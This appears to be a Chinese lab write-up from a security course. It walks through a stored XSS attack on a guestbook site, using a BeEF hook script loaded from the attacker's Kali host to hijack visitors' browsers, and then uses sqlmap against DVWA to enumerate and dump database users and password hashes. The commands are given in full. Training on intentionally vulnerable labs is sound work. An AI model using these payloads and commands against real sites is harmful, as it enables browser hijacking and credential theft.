渗透实验 XSS和SQL注入(Lab3.0)
2023-12-23 22:32:34
windows server2003IIS搭建
配置2003的虚拟机
1、利用AWVS扫描留言簿网站(安装见参考文档0.AWVS安装与使用.docx),发现其存在XSS漏洞,截图。
2、 Kali使用beef生成恶意代码
cd /usr/share/beef-xss
./beef
执行上面两条命令
账户是beef
密码是之前自己设置好的
hook.js里面有自带的恶意代码
3、访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板
<script src="http://Kali的IP地址:3000/hook.js"></script>
4、管理员登录login.htm,账号密码均为admin,审核用户留言。只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持,指定被劫持网站为学校主页,将你在beff中的配置。
左边就是别人的IP
右边就是可以控制浏览器的转跳,这里我跳的是百度
5、回答问题:实验中XSS攻击属于哪种类型?
存储型
XSS
SQL注入部分:DVWA+SQLmap+Mysql注入实战
实验环境搭建
打开Metasploitable2后,里面有搭建好的DVWA,访问http://Metasploitable的IP/dvwa (可能需要先扫描一下内网的ip,确定Metasploitable2的ip地址)并且把安全等级设置为最低
此时可以断定有SQL注入漏洞
http://IP地址/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#
2、枚举当前使用的数据库名称和用户名。
sqlmap语法参数
-u:指定目标URL
--cookie:当前会话的cookies值
-b:获取数据库类型,检查数据库管理系统标识
--current-db:获取当前数据库
--current-user:获取当前数据库使用的用户
--string:当查询可用时用来匹配页面中的字符串
--users:枚举DBMS用户
-password:枚举DBMS用户密码hash
sqlmap -u "http://192.168.209.135/dvwa/vulnerabilities/sqli/?id=11&Submit=Submit#" --cookie='security=low; PHPSESSID=92bf1c4db806d60f770f3a765c43c61f' -b --current-db --current-user
注意你cookie,还有你的文件路径是否一样
3、枚举数据库用户名和密码
sqlmap -u "http://192.168.209.135/dvwa/vulnerabilities/sqli/?id=11&Submit=Submit#" --cookie='security=low; PHPSESSID=92bf1c4db806d60f770f3a765c43c61f' --users --password
4、枚举数据库
–dbs:枚举当前数据库
sqlmap -u "http://192.168.209.135/dvwa/vulnerabilities/sqli/?id=11&Submit=Submit#" --cookie='security=low; PHPSESSID=92bf1c4db806d60f770f3a765c43c61f' --dbs
5、枚举数据库和指定数据库的数据表
-D 数据库名:指定数据库
–tables:枚举指定数据库的所有表
sqlmap -u "http://192.168.209.135/dvwa/vulnerabilities/sqli/?id=11&Submit=Submit#" --cookie='security=low; PHPSESSID=92bf1c4db806d60f770f3a765c43c61f' -D "dvwa" --tables
6、获取指定数据库和表中所有列的信息
-D:指定的数据库
-T:指定数据库中的数据表
–columns:获取列的信息
sqlmap -u "http://192.168.209.135/dvwa/vulnerabilities/sqli/?id=11&Submit=Submit#" --cookie='security=low; PHPSESSID=92bf1c4db806d60f770f3a765c43c61f' -D "dvwa" -T users --columns
7、枚举指定数据表中的所有用户名与密码,并down到本地。
-C:枚举数据表中的列
–dump:存储sqlmap -u "http://192.168.209.135/dvwa/vulnerabilities/sqli/?id=11&Submit=Submit#" --cookie='security=low; PHPSESSID=92bf1c4db806d60f770f3a765c43c61f' -D "dvwa" -T users -C “user_id,user,password” --dump
文章来源:https://blog.csdn.net/m0_72827793/article/details/135172777
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!